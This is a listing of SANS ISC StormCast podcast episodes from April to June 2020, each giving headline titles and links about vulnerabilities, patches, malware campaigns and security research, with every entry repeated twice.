Type 2 Strackstrings https://isc.sans.edu/forums/diary/Stackstrings+type+2/26192/ More Details About AddTrust External CA Root Expiration https://www.agwa.name/blog/post/fixing_the_addtrust_root_expiration VMWare Cloud Director Vulnerability and Exploit https://citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/
6/3/20205 minutes, 34 seconds
Episode Artwork

ISC StormCast for Wednesday, June 3rd 2020

Type 2 Strackstrings https://isc.sans.edu/forums/diary/Stackstrings+type+2/26192/ More Details About AddTrust External CA Root Expiration https://www.agwa.name/blog/post/fixing_the_addtrust_root_expiration VMWare Cloud Director Vulnerability and Exploit https://citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/
6/3/20205 minutes, 34 seconds
Episode Artwork

ISC StormCast for Tuesday, June 2nd 2020

Apple Patches Unc0ver https://support.apple.com/en-us/HT201222 Office 365 Adds Details About Malicious E-Mail Attachments https://www.microsoft.com/en-us/microsoft-365/roadmap?filters=&searchterms=64570 Impact of Research on Our Data https://isc.sans.edu/forums/diary/The+Impact+of+Researchers+on+Our+Data/26182/
6/2/20207 minutes, 6 seconds
Episode Artwork

ISC StormCast for Tuesday, June 2nd 2020

Apple Patches Unc0ver https://support.apple.com/en-us/HT201222 Office 365 Adds Details About Malicious E-Mail Attachments https://www.microsoft.com/en-us/microsoft-365/roadmap?filters=&searchterms=64570 Impact of Research on Our Data https://isc.sans.edu/forums/diary/The+Impact+of+Researchers+on+Our+Data/26182/
6/2/20207 minutes, 6 seconds
Episode Artwork

ISC StormCast for Monday, June 1st 2020

Sectigo AddTrust CA Expired https://support.sectigo.com/articles/Knowledge/Sectigo-AddTrust-External-CA-Root-Expiring-May-30-2020 Critical Sign In With Apple Flaw https://bhavukjain.com/blog/2020/05/30/zeroday-signin-with-apple/ DABANGG: Refined Flush Based Cache Attacks https://www.cse.iitk.ac.in/users/biswap/DABANGG.pdf New Website Explaining FIDO https://loginwithfido.com/
6/1/20206 minutes, 15 seconds
Episode Artwork

ISC StormCast for Monday, June 1st 2020

Sectigo AddTrust CA Expired https://support.sectigo.com/articles/Knowledge/Sectigo-AddTrust-External-CA-Root-Expiring-May-30-2020 Critical Sign In With Apple Flaw https://bhavukjain.com/blog/2020/05/30/zeroday-signin-with-apple/ DABANGG: Refined Flush Based Cache Attacks https://www.cse.iitk.ac.in/users/biswap/DABANGG.pdf New Website Explaining FIDO https://loginwithfido.com/
6/1/20206 minutes, 15 seconds
Episode Artwork

ISC StormCast for Friday, May 29th 2020

USBFuzz Finds Numerous USB Flaws https://www.nebelwelt.net/files/20SEC3.pdf Cisco Products Vulnerable to Saltstack Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG Another Nail in the Coffin for SHA-1 https://eprint.iacr.org/2020/014.pdf STI Student: Andy Piazza; Qualifying Threat Actor Assessments https://www.sans.org/reading-room/whitepapers/threatintelligence/paper/39585
5/29/202018 minutes, 43 seconds
Episode Artwork

ISC StormCast for Friday, May 29th 2020

USBFuzz Finds Numerous USB Flaws https://www.nebelwelt.net/files/20SEC3.pdf Cisco Products Vulnerable to Saltstack Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG Another Nail in the Coffin for SHA-1 https://eprint.iacr.org/2020/014.pdf STI Student: Andy Piazza; Qualifying Threat Actor Assessments https://www.sans.org/reading-room/whitepapers/threatintelligence/paper/39585
5/29/202018 minutes, 43 seconds
Episode Artwork

ISC StormCast for Thursday, May 28th 2020

Phishing With Google Cloud https://isc.sans.edu/forums/diary/Frankensteins+phishing+using+Google+Cloud+Storage/26174/ Trend Micro AntiVirus Blocked by Microsoft https://billdemirkapi.me/How-to-use-Trend-Micro-Rootkit-Remover-to-Install-a-Rootkit/ Netgear Nighthawk Firmware Update Vulnerability https://iot-lab-fh-ooe.github.io/netgear_update_vulnerability/
5/28/20206 minutes, 49 seconds
Episode Artwork

ISC StormCast for Thursday, May 28th 2020

Phishing With Google Cloud https://isc.sans.edu/forums/diary/Frankensteins+phishing+using+Google+Cloud+Storage/26174/ Trend Micro AntiVirus Blocked by Microsoft https://billdemirkapi.me/How-to-use-Trend-Micro-Rootkit-Remover-to-Install-a-Rootkit/ Netgear Nighthawk Firmware Update Vulnerability https://iot-lab-fh-ooe.github.io/netgear_update_vulnerability/
5/28/20206 minutes, 49 seconds
Episode Artwork

ISC StormCast for Wednesday, May 27th 2020

Where is SHA3 https://isc.sans.edu/forums/diary/Seriously+SHA3+where+art+thou/26170/ Apple Updates https://support.apple.com/en-us/HT201222 Google ZDI Releases Details Regarding Unpatched Windows Vulnerabilities https://www.zerodayinitiative.com/advisories/ZDI-20-666/ https://www.zerodayinitiative.com/advisories/ZDI-20-665/ https://www.zerodayinitiative.com/advisories/ZDI-20-663/ https://www.zerodayinitiative.com/advisories/ZDI-20-662/ https://www.zerodayinitiative.com/advisories/ZDI-20-664/ Research into Phish Detection https://medium.com/@curtbraz/these-arent-the-phish-you-re-looking-for-7374c3986af5
5/27/20205 minutes, 59 seconds
Episode Artwork

ISC StormCast for Wednesday, May 27th 2020

Where is SHA3 https://isc.sans.edu/forums/diary/Seriously+SHA3+where+art+thou/26170/ Apple Updates https://support.apple.com/en-us/HT201222 Google ZDI Releases Details Regarding Unpatched Windows Vulnerabilities https://www.zerodayinitiative.com/advisories/ZDI-20-666/ https://www.zerodayinitiative.com/advisories/ZDI-20-665/ https://www.zerodayinitiative.com/advisories/ZDI-20-663/ https://www.zerodayinitiative.com/advisories/ZDI-20-662/ https://www.zerodayinitiative.com/advisories/ZDI-20-664/ Research into Phish Detection https://medium.com/@curtbraz/these-arent-the-phish-you-re-looking-for-7374c3986af5
5/27/20205 minutes, 59 seconds
Episode Artwork

ISC StormCast for Tuesday, May 26th 2020

Malicious PowerPoint Add-Ins Deliver Malware https://isc.sans.edu/forums/diary/AgentTesla+Delivered+via+a+Malicious+PowerPoint+AddIn/26162/ Virtual Machine Delivers Malware https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/ iOS Patch Analysis https://blog.zecops.com/vulnerabilities/hidden-demons-maildemon-patch-analysis-ios-13-4-5-beta-vs-ios-13-5/ eBay Port Scanning https://www.ghacks.net/2020/05/25/ebay-is-port-scanning-your-system-when-you-load-the-webpage/ iPhone Jailbreak https://thehackernews.com/2020/05/iphone-ios-jailbreak-tools.html SANSFIRE https://isc.sans.edu/sansfire
5/26/20206 minutes, 34 seconds
Episode Artwork

ISC StormCast for Tuesday, May 26th 2020

Malicious PowerPoint Add-Ins Deliver Malware https://isc.sans.edu/forums/diary/AgentTesla+Delivered+via+a+Malicious+PowerPoint+AddIn/26162/ Virtual Machine Delivers Malware https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/ iOS Patch Analysis https://blog.zecops.com/vulnerabilities/hidden-demons-maildemon-patch-analysis-ios-13-4-5-beta-vs-ios-13-5/ eBay Port Scanning https://www.ghacks.net/2020/05/25/ebay-is-port-scanning-your-system-when-you-load-the-webpage/ iPhone Jailbreak https://thehackernews.com/2020/05/iphone-ios-jailbreak-tools.html SANSFIRE https://isc.sans.edu/sansfire
5/26/20206 minutes, 34 seconds
Episode Artwork

ISC StormCast for Friday, May 22nd 2020

Malware Triage with FLOSS: API Calls Based Behavior https://isc.sans.edu/forums/diary/Malware+Triage+with+FLOSS+API+Calls+Based+Behavior/26156/ Verizon Breach Report https://enterprise.verizon.com/resources/reports/dbir/ Apple Updates https://support.apple.com/en-us/HT201222 Sophos Firewall Vulnerability Exploit https://news.sophos.com/en-us/2020/05/21/asnarok2/
5/22/20206 minutes, 2 seconds
Episode Artwork

ISC StormCast for Friday, May 22nd 2020

Malware Triage with FLOSS: API Calls Based Behavior https://isc.sans.edu/forums/diary/Malware+Triage+with+FLOSS+API+Calls+Based+Behavior/26156/ Verizon Breach Report https://enterprise.verizon.com/resources/reports/dbir/ Apple Updates https://support.apple.com/en-us/HT201222 Sophos Firewall Vulnerability Exploit https://news.sophos.com/en-us/2020/05/21/asnarok2/
5/22/20206 minutes, 2 seconds
Episode Artwork

ISC StormCast for Thursday, May 21st 2020

IceID Malware Update https://isc.sans.edu/forums/diary/Microsoft+Word+document+with+malicious+macro+pushes+IcedID+Bokbot/26146/ NXNSAttack DNS Amplification https://www.nxnsattack.com/ https://en.blog.nic.cz/2020/05/19/nxnsattack-upgrade-resolvers-to-stop-new-kind-of-random-subdomain-attack/ Adobe Updates https://helpx.adobe.com/security.html
5/21/20205 minutes, 47 seconds
Episode Artwork

ISC StormCast for Thursday, May 21st 2020

IceID Malware Update https://isc.sans.edu/forums/diary/Microsoft+Word+document+with+malicious+macro+pushes+IcedID+Bokbot/26146/ NXNSAttack DNS Amplification https://www.nxnsattack.com/ https://en.blog.nic.cz/2020/05/19/nxnsattack-upgrade-resolvers-to-stop-new-kind-of-random-subdomain-attack/ Adobe Updates https://helpx.adobe.com/security.html
5/21/20205 minutes, 47 seconds
Episode Artwork

ISC StormCast for Wednesday, May 20th 2020

Spike of Scans for Port 62234 https://isc.sans.edu/forums/diary/What+is+up+on+Port+62234/26144/ Cisco Patches https://tools.cisco.com/security/center/publicationListing.x https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-info-disclose-9eJtycMB Google Chrome 83 Released https://chromereleases.googleblog.com/ QNAP Vulnerability Details Released https://medium.com/bugbountywriteup/qnap-pre-auth-root-rce-affecting-450k-devices-on-the-internet-d55488d28a05 ISC YouTube Channel https://www.youtube.com/channel/UCfbOsqPmWg1H_34hTjKEW2A
5/20/20206 minutes, 32 seconds
Episode Artwork

ISC StormCast for Wednesday, May 20th 2020

Spike of Scans for Port 62234 https://isc.sans.edu/forums/diary/What+is+up+on+Port+62234/26144/ Cisco Patches https://tools.cisco.com/security/center/publicationListing.x https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-info-disclose-9eJtycMB Google Chrome 83 Released https://chromereleases.googleblog.com/ QNAP Vulnerability Details Released https://medium.com/bugbountywriteup/qnap-pre-auth-root-rce-affecting-450k-devices-on-the-internet-d55488d28a05 ISC YouTube Channel https://www.youtube.com/channel/UCfbOsqPmWg1H_34hTjKEW2A
5/20/20206 minutes, 32 seconds
Episode Artwork

ISC StormCast for Tuesday, May 19th 2020

Antivirus & Multiple Detections https://isc.sans.edu/forums/diary/Antivirus+Multiple+Detections/26134/ Office 365 Returning Search Results from Other Organizations https://www.theregister.co.uk/2020/05/18/microsoft_office_365_internal_search_mixup/ MagicPairing Vulnerabilities https://arxiv.org/pdf/2005.07255.pdf BIAS: Bluetooth Impersonation AttackS https://francozappa.github.io/about-bias/
5/19/20206 minutes, 16 seconds
Episode Artwork

ISC StormCast for Tuesday, May 19th 2020

Antivirus & Multiple Detections https://isc.sans.edu/forums/diary/Antivirus+Multiple+Detections/26134/ Office 365 Returning Search Results from Other Organizations https://www.theregister.co.uk/2020/05/18/microsoft_office_365_internal_search_mixup/ MagicPairing Vulnerabilities https://arxiv.org/pdf/2005.07255.pdf BIAS: Bluetooth Impersonation AttackS https://francozappa.github.io/about-bias/
5/19/20206 minutes, 16 seconds
Episode Artwork

ISC StormCast for Monday, May 18th 2020

OWA Scans https://isc.sans.edu/forums/diary/Scanning+for+Outlook+Web+Access+OWA+Microsoft+Exchange+Control+Panel+ECP/26132/ Edison iOS E-Mail Client Leaks Data https://www.theverge.com/2020/5/16/21260967/edison-mail-update-ios-security-bug COMpfun Malware Uses Status Codes to Communicate https://securelist.com/compfun-http-status-based-trojan/96874/ PAN OS Patches https://securityaffairs.co/wordpress/103265/security/palo-alto-networks-pan-os-flaws.html
5/18/20206 minutes, 19 seconds
Episode Artwork

ISC StormCast for Monday, May 18th 2020

OWA Scans https://isc.sans.edu/forums/diary/Scanning+for+Outlook+Web+Access+OWA+Microsoft+Exchange+Control+Panel+ECP/26132/ Edison iOS E-Mail Client Leaks Data https://www.theverge.com/2020/5/16/21260967/edison-mail-update-ios-security-bug COMpfun Malware Uses Status Codes to Communicate https://securelist.com/compfun-http-status-based-trojan/96874/ PAN OS Patches https://securityaffairs.co/wordpress/103265/security/palo-alto-networks-pan-os-flaws.html
5/18/20206 minutes, 19 seconds
Episode Artwork

ISC StormCast for Friday, May 15th 2020

Rethinking Severity https://isc.sans.edu/forums/diary/Patch+Tuesday+Revisited+CVE20201048+isnt+as+Medium+as+MS+Would+Have+You+Believe/26124/ Top Exploited Vulnerabilities https://www.us-cert.gov/ncas/alerts/aa20-133a Zerodium Drops Payouts For iOS/Safari Exploits https://twitter.com/Zerodium/status/1260541578747064326?s=20 BigIP Edge Client Vulenrability https://support.f5.com/csp/article/K20346072
5/15/20206 minutes, 2 seconds
Episode Artwork

ISC StormCast for Friday, May 15th 2020

Rethinking Severity https://isc.sans.edu/forums/diary/Patch+Tuesday+Revisited+CVE20201048+isnt+as+Medium+as+MS+Would+Have+You+Believe/26124/ Top Exploited Vulnerabilities https://www.us-cert.gov/ncas/alerts/aa20-133a Zerodium Drops Payouts For iOS/Safari Exploits https://twitter.com/Zerodium/status/1260541578747064326?s=20 BigIP Edge Client Vulenrability https://support.f5.com/csp/article/K20346072
5/15/20206 minutes, 2 seconds
Episode Artwork

ISC StormCast for Thursday, May 14th 2020

Malspam with Links to ZIP Archives Pushes Dridex Malware https://isc.sans.edu/forums/diary/Malspam+with+links+to+zip+archives+pushes+Dridex+malware/26116/ Ramsay Cyber Espionage Toolkit https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/ Windows DNS over HTTPS Preview https://techcommunity.microsoft.com/t5/networking-blog/windows-insiders-can-now-test-dns-over-https/ba-p/1381282# ISC Handler Series (SANSFIRE) https://www.sans.org/event/sansfire-2020/bonus-sessions/
5/14/20205 minutes, 58 seconds
Episode Artwork

ISC StormCast for Thursday, May 14th 2020

Malspam with Links to ZIP Archives Pushes Dridex Malware https://isc.sans.edu/forums/diary/Malspam+with+links+to+zip+archives+pushes+Dridex+malware/26116/ Ramsay Cyber Espionage Toolkit https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/ Windows DNS over HTTPS Preview https://techcommunity.microsoft.com/t5/networking-blog/windows-insiders-can-now-test-dns-over-https/ba-p/1381282# ISC Handler Series (SANSFIRE) https://www.sans.org/event/sansfire-2020/bonus-sessions/
5/14/20205 minutes, 58 seconds
Episode Artwork

ISC StormCast for Wednesday, May 13th 2020

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+May+2020+Patch+Tuesday/26114/ Adobe Security Updates https://helpx.adobe.com/security.html Android Applications Expose Firebase Databases https://www.comparitech.com/blog/information-security/firebase-misconfiguration-report/#What_data_is_exposed More Magecart Sighted https://maxkersten.nl/2020/05/06/backtracking-magecart-infections/ Glitter vs. Thunderspy https://www.youtube.com/watch?v=vlK5rrlc44g
5/13/20207 minutes, 3 seconds
Episode Artwork

ISC StormCast for Wednesday, May 13th 2020

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+May+2020+Patch+Tuesday/26114/ Adobe Security Updates https://helpx.adobe.com/security.html Android Applications Expose Firebase Databases https://www.comparitech.com/blog/information-security/firebase-misconfiguration-report/#What_data_is_exposed More Magecart Sighted https://maxkersten.nl/2020/05/06/backtracking-magecart-infections/ Glitter vs. Thunderspy https://www.youtube.com/watch?v=vlK5rrlc44g
5/13/20207 minutes, 3 seconds
Episode Artwork

ISC StormCast for Tuesday, May 12th 2020

Excel 4 Macro Analysis: XLMMacroDeobfuscator https://isc.sans.edu/forums/diary/Excel+4+Macro+Analysis+XLMMacroDeobfuscator/26110/ LinkedIn Phish https://youtu.be/g0WHz6rikoc ThunderSpy Thunderbolt Attack https://thunderspy.io/ vBulletin Vulnerability https://nvd.nist.gov/vuln/detail/CVE-2020-12720 Mini-Netwars https://www.sans.org/mini-netwars
5/12/20205 minutes, 54 seconds
Episode Artwork

ISC StormCast for Tuesday, May 12th 2020

Excel 4 Macro Analysis: XLMMacroDeobfuscator https://isc.sans.edu/forums/diary/Excel+4+Macro+Analysis+XLMMacroDeobfuscator/26110/ LinkedIn Phish https://youtu.be/g0WHz6rikoc ThunderSpy Thunderbolt Attack https://thunderspy.io/ vBulletin Vulnerability https://nvd.nist.gov/vuln/detail/CVE-2020-12720 Mini-Netwars https://www.sans.org/mini-netwars
5/12/20205 minutes, 54 seconds
Episode Artwork

ISC StormCast for Monday, May 11th 2020

YARA 4.0.0 Released https://isc.sans.edu/forums/diary/YARA+v400+BASE64+Strings/26106/ VMWare Patches vRealize to Address Saltstack Vulnerabilities https://www.vmware.com/security/advisories/VMSA-2020-0009.html Samsung Paches Android RCE Vulnerabilities https://bugs.chromium.org/p/project-zero/issues/detail?id=2002 https://security.samsungmobile.com/securityUpdate.smsb MacOS 2FA Application Trojan https://blog.malwarebytes.com/threat-analysis/2020/05/new-mac-variant-of-lazarus-dacls-rat-distributed-via-trojanized-2fa-app/
5/11/20205 minutes, 24 seconds
Episode Artwork

ISC StormCast for Monday, May 11th 2020

YARA 4.0.0 Released https://isc.sans.edu/forums/diary/YARA+v400+BASE64+Strings/26106/ VMWare Patches vRealize to Address Saltstack Vulnerabilities https://www.vmware.com/security/advisories/VMSA-2020-0009.html Samsung Paches Android RCE Vulnerabilities https://bugs.chromium.org/p/project-zero/issues/detail?id=2002 https://security.samsungmobile.com/securityUpdate.smsb MacOS 2FA Application Trojan https://blog.malwarebytes.com/threat-analysis/2020/05/new-mac-variant-of-lazarus-dacls-rat-distributed-via-trojanized-2fa-app/
5/11/20205 minutes, 24 seconds
Episode Artwork

ISC StormCast for Friday, May 8th 2020

Scanning With NMAP NSE Scripts https://isc.sans.edu/forums/diary/Scanning+with+nmaps+NSE+scripts/26096/ iOS Psychic Paper Vulerability https://siguza.github.io/psychicpaper/ World Password Day https://www.microsoft.com/security/blog/2020/05/07/protect-accounts-smarter-ways-sign-in-world-passwordless-day https://tails.boum.org/news/version_4.6/index.en.html Cisco Kerberos Bypass https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-asa-kerberos-bypass-96Gghe2sS
5/8/20205 minutes, 47 seconds
Episode Artwork

ISC StormCast for Friday, May 8th 2020

Scanning With NMAP NSE Scripts https://isc.sans.edu/forums/diary/Scanning+with+nmaps+NSE+scripts/26096/ iOS Psychic Paper Vulerability https://siguza.github.io/psychicpaper/ World Password Day https://www.microsoft.com/security/blog/2020/05/07/protect-accounts-smarter-ways-sign-in-world-passwordless-day https://tails.boum.org/news/version_4.6/index.en.html Cisco Kerberos Bypass https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-asa-kerberos-bypass-96Gghe2sS
5/8/20205 minutes, 47 seconds
Episode Artwork

ISC StormCast for Thursday, May 7th 2020

Keeping an Eye on Malicious Files Life Time https://isc.sans.edu/forums/diary/Keeping+an+Eye+on+Malicious+Files+Life+Time/26092/ Fake Crypto Wallet Chrome Extensions https://www.theregister.co.uk/2020/05/06/chrome_malicious_extensions/ Favicon Hides Credit Card Skimmer https://blog.malwarebytes.com/threat-analysis/2020/05/credit-card-skimmer-masquerades-as-favicon/ WebEx Phishing https://abnormalsecurity.com/blog/abnormal-attack-stories-cisco-webex-phishing/
5/7/20205 minutes, 56 seconds
Episode Artwork

ISC StormCast for Thursday, May 7th 2020

Keeping an Eye on Malicious Files Life Time https://isc.sans.edu/forums/diary/Keeping+an+Eye+on+Malicious+Files+Life+Time/26092/ Fake Crypto Wallet Chrome Extensions https://www.theregister.co.uk/2020/05/06/chrome_malicious_extensions/ Favicon Hides Credit Card Skimmer https://blog.malwarebytes.com/threat-analysis/2020/05/credit-card-skimmer-masquerades-as-favicon/ WebEx Phishing https://abnormalsecurity.com/blog/abnormal-attack-stories-cisco-webex-phishing/
5/7/20205 minutes, 56 seconds
Episode Artwork

ISC StormCast for Wednesday, May 6th 2020

Do Cloud Security Features Replace Pesonnel Security Capabilities? https://isc.sans.edu/forums/diary/Cloud+Security+Features+Dont+Replace+the+Need+for+Personnel+Security+Capabilities/26088/ Citrix ShareFile Storage Zones Controller Update https://support.citrix.com/article/CTX269106 Android Update https://source.android.com/security/bulletin/2020-05-01 Firefox Update https://www.mozilla.org/en-US/firefox/76.0/releasenotes/ Dell OS Recovery Image Insecure Inherited Permissions https://www.dell.com/support/article/de-de/sln321036/dsa-2020-059-dell-os-recovery-image-insecure-inherited-permissions-vulnerability?lang=en WordPress Update https://wordpress.org/support/wordpress-version/version-5-4-1/#security-updates
5/6/20205 minutes, 14 seconds
Episode Artwork

ISC StormCast for Wednesday, May 6th 2020

Do Cloud Security Features Replace Pesonnel Security Capabilities? https://isc.sans.edu/forums/diary/Cloud+Security+Features+Dont+Replace+the+Need+for+Personnel+Security+Capabilities/26088/ Citrix ShareFile Storage Zones Controller Update https://support.citrix.com/article/CTX269106 Android Update https://source.android.com/security/bulletin/2020-05-01 Firefox Update https://www.mozilla.org/en-US/firefox/76.0/releasenotes/ Dell OS Recovery Image Insecure Inherited Permissions https://www.dell.com/support/article/de-de/sln321036/dsa-2020-059-dell-os-recovery-image-insecure-inherited-permissions-vulnerability?lang=en WordPress Update https://wordpress.org/support/wordpress-version/version-5-4-1/#security-updates
5/6/20205 minutes, 14 seconds
Episode Artwork

ISC StormCast for Tuesday, May 5th 2020

Exploring the Sysmon 11 File Deletion Protection https://isc.sans.edu/forums/diary/Sysmon+and+File+Deletion/26084/ Digicert CT Compromise https://groups.google.com/a/chromium.org/forum/#!topic/ct-policy/aKNbZuJzwfM WebLogic Flaw (new one..) Exploited in the Wild https://blogs.oracle.com/security/apply-april-2020-cpu
5/5/20205 minutes, 24 seconds
Episode Artwork

ISC StormCast for Tuesday, May 5th 2020

Exploring the Sysmon 11 File Deletion Protection https://isc.sans.edu/forums/diary/Sysmon+and+File+Deletion/26084/ Digicert CT Compromise https://groups.google.com/a/chromium.org/forum/#!topic/ct-policy/aKNbZuJzwfM WebLogic Flaw (new one..) Exploited in the Wild https://blogs.oracle.com/security/apply-april-2020-cpu
5/5/20205 minutes, 24 seconds
Episode Artwork

ISC StormCast for Monday, May 4th 2020

ZIP Files and AES https://isc.sans.edu/forums/diary/ZIP+AES/26080/ Saltstack Vulnerability Exploited in the Wild https://status.ghost.org/ Mobile Device Manager Compromise https://research.checkpoint.com/2020/first-seen-in-the-wild-mobile-as-attack-vector-using-mdm/
5/4/20205 minutes, 25 seconds
Episode Artwork

ISC StormCast for Monday, May 4th 2020

ZIP Files and AES https://isc.sans.edu/forums/diary/ZIP+AES/26080/ Saltstack Vulnerability Exploited in the Wild https://status.ghost.org/ Mobile Device Manager Compromise https://research.checkpoint.com/2020/first-seen-in-the-wild-mobile-as-attack-vector-using-mdm/
5/4/20205 minutes, 25 seconds
Episode Artwork

ISC StormCast for Friday, May 1st 2020

Collecting IOCs from IMAP Folder https://isc.sans.edu/forums/diary/Collecting+IOCs+from+IMAP+Folder/26070/ Attack Traffic on TCP Port 9673 https://isc.sans.edu/forums/diary/Attack+traffic+on+TCP+port+9673/26074/ Saltstack Authorization Bypass https://labs.f-secure.com/advisories/saltstack-authorization-bypass Mac Sandbox Escape https://lapcatsoftware.com/articles/sandbox-escape.html
5/1/20207 minutes, 15 seconds
Episode Artwork

ISC StormCast for Friday, May 1st 2020

Collecting IOCs from IMAP Folder https://isc.sans.edu/forums/diary/Collecting+IOCs+from+IMAP+Folder/26070/ Attack Traffic on TCP Port 9673 https://isc.sans.edu/forums/diary/Attack+traffic+on+TCP+port+9673/26074/ Saltstack Authorization Bypass https://labs.f-secure.com/advisories/saltstack-authorization-bypass Mac Sandbox Escape https://lapcatsoftware.com/articles/sandbox-escape.html
5/1/20207 minutes, 15 seconds
Episode Artwork

ISC StormCast for Thursday, April 30th 2020

Privacy Preserving Protocols to Trace Covid19 Exposure https://isc.sans.edu/forums/diary/Privacy+Preserving+Protocols+to+Trace+Covid19+Exposure/26066/ Google Chrome Update https://chromereleases.googleblog.com/2020/04/stable-channel-update-for-desktop_27.html https://docs.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security Updated Version of Sysmon https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon https://techcommunity.microsoft.com/t5/sysinternals-blog/sysmon-v11-0-livekd-v5-63-process-explorer-v16-32-coreinfo-v3-5/ba-p/1345153 Shade Ransomware Keys Released https://github.com/shade-team/keys/blob/master/README.md Exploiting the Exploiters https://medium.com/@curtbraz/exploiting-the-exploiters-46fd0d620fd8
4/30/20206 minutes, 16 seconds
Episode Artwork

ISC StormCast for Thursday, April 30th 2020

Privacy Preserving Protocols to Trace Covid19 Exposure https://isc.sans.edu/forums/diary/Privacy+Preserving+Protocols+to+Trace+Covid19+Exposure/26066/ Google Chrome Update https://chromereleases.googleblog.com/2020/04/stable-channel-update-for-desktop_27.html https://docs.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security Updated Version of Sysmon https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon https://techcommunity.microsoft.com/t5/sysinternals-blog/sysmon-v11-0-livekd-v5-63-process-explorer-v16-32-coreinfo-v3-5/ba-p/1345153 Shade Ransomware Keys Released https://github.com/shade-team/keys/blob/master/README.md Exploiting the Exploiters https://medium.com/@curtbraz/exploiting-the-exploiters-46fd0d620fd8
4/30/20206 minutes, 16 seconds
Episode Artwork

ISC StormCast for Wednesday, April 29th 2020

Agent Tesla Delivered by the Same Phishing Campagin for Over a Year https://isc.sans.edu/forums/diary/Agent+Tesla+delivered+by+the+same+phishing+campaign+for+over+a+year/26062/ VMWare ESXi Patch https://www.vmware.com/security/advisories/VMSA-2020-0008.html Microsoft Guidance For Ransomware Response https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/ Adobe Security Patches https://helpx.adobe.com/security.html
4/29/20204 minutes, 50 seconds
Episode Artwork

ISC StormCast for Wednesday, April 29th 2020

Agent Tesla Delivered by the Same Phishing Campagin for Over a Year https://isc.sans.edu/forums/diary/Agent+Tesla+delivered+by+the+same+phishing+campaign+for+over+a+year/26062/ VMWare ESXi Patch https://www.vmware.com/security/advisories/VMSA-2020-0008.html Microsoft Guidance For Ransomware Response https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/ Adobe Security Patches https://helpx.adobe.com/security.html
4/29/20204 minutes, 50 seconds
Episode Artwork

ISC StormCast for Tuesday, April 28th 2020

Powershell Payload Stored in a PSCredential Object https://isc.sans.edu/forums/diary/Powershell+Payload+Stored+in+a+PSCredential+Object/26058/ Microsoft Teams Account Takeover Bug https://www.cyberark.com/threat-research-blog/beware-of-the-gif-account-takeover-vulnerability-in-microsoft-teams/ USB Drives used to Spread Crypto Coin Mining Botnet https://www.welivesecurity.com/2020/04/23/eset-discovery-monero-mining-botnet-disrupted/
4/28/20206 minutes, 12 seconds
Episode Artwork

ISC StormCast for Tuesday, April 28th 2020

Powershell Payload Stored in a PSCredential Object https://isc.sans.edu/forums/diary/Powershell+Payload+Stored+in+a+PSCredential+Object/26058/ Microsoft Teams Account Takeover Bug https://www.cyberark.com/threat-research-blog/beware-of-the-gif-account-takeover-vulnerability-in-microsoft-teams/ USB Drives used to Spread Crypto Coin Mining Botnet https://www.welivesecurity.com/2020/04/23/eset-discovery-monero-mining-botnet-disrupted/
4/28/20206 minutes, 12 seconds
Episode Artwork

ISC StormCast for Monday, April 27th 2020

Malware Bazaar https://isc.sans.edu/forums/diary/MALWARE+Bazaar/26052/ CIRA Luanches Canadian Shield https://www.cira.ca/newsroom/canadian-shield/cira-launches-canadian-shield-provide-free-privacy-and-security-canadians Covid19 Tracing Protocols https://github.com/DP-3T/documents https://www.pepp-pt.org/content https://www.apple.com/covid19/contacttracing/ Sophos XG Firewall SQL Injection Vulnerablity Exploited https://community.sophos.com/kb/en-us/135412
4/27/20207 minutes, 39 seconds
Episode Artwork

ISC StormCast for Monday, April 27th 2020

Malware Bazaar https://isc.sans.edu/forums/diary/MALWARE+Bazaar/26052/ CIRA Luanches Canadian Shield https://www.cira.ca/newsroom/canadian-shield/cira-launches-canadian-shield-provide-free-privacy-and-security-canadians Covid19 Tracing Protocols https://github.com/DP-3T/documents https://www.pepp-pt.org/content https://www.apple.com/covid19/contacttracing/ Sophos XG Firewall SQL Injection Vulnerablity Exploited https://community.sophos.com/kb/en-us/135412
4/27/20207 minutes, 39 seconds
Episode Artwork

ISC StormCast for Friday, April 24th 2020

GCC's New Security Analyzer Finds Flaw in OpenSSL https://developers.redhat.com/blog/2020/03/26/static-analysis-in-gcc-10/ IBM Spectrum Protect Server Stack Based Buffer Overflow https://www.ibm.com/support/pages/node/6195706 Possible Issues With Cummulative Windows Updates https://www.reddit.com/search/?q=KB4549951 Using a GPU as a Radio https://duo.com/labs/research/finding-radio-sidechannels Comparing Red Team Platforms https://redcanary.com/blog/comparing-red-team-platforms/
4/24/20207 minutes, 21 seconds
Episode Artwork

ISC StormCast for Friday, April 24th 2020

GCC's New Security Analyzer Finds Flaw in OpenSSL https://developers.redhat.com/blog/2020/03/26/static-analysis-in-gcc-10/ IBM Spectrum Protect Server Stack Based Buffer Overflow https://www.ibm.com/support/pages/node/6195706 Possible Issues With Cummulative Windows Updates https://www.reddit.com/search/?q=KB4549951 Using a GPU as a Radio https://duo.com/labs/research/finding-radio-sidechannels Comparing Red Team Platforms https://redcanary.com/blog/comparing-red-team-platforms/
4/24/20207 minutes, 21 seconds
Episode Artwork

ISC StormCast for Thursday, April 23rd 2020

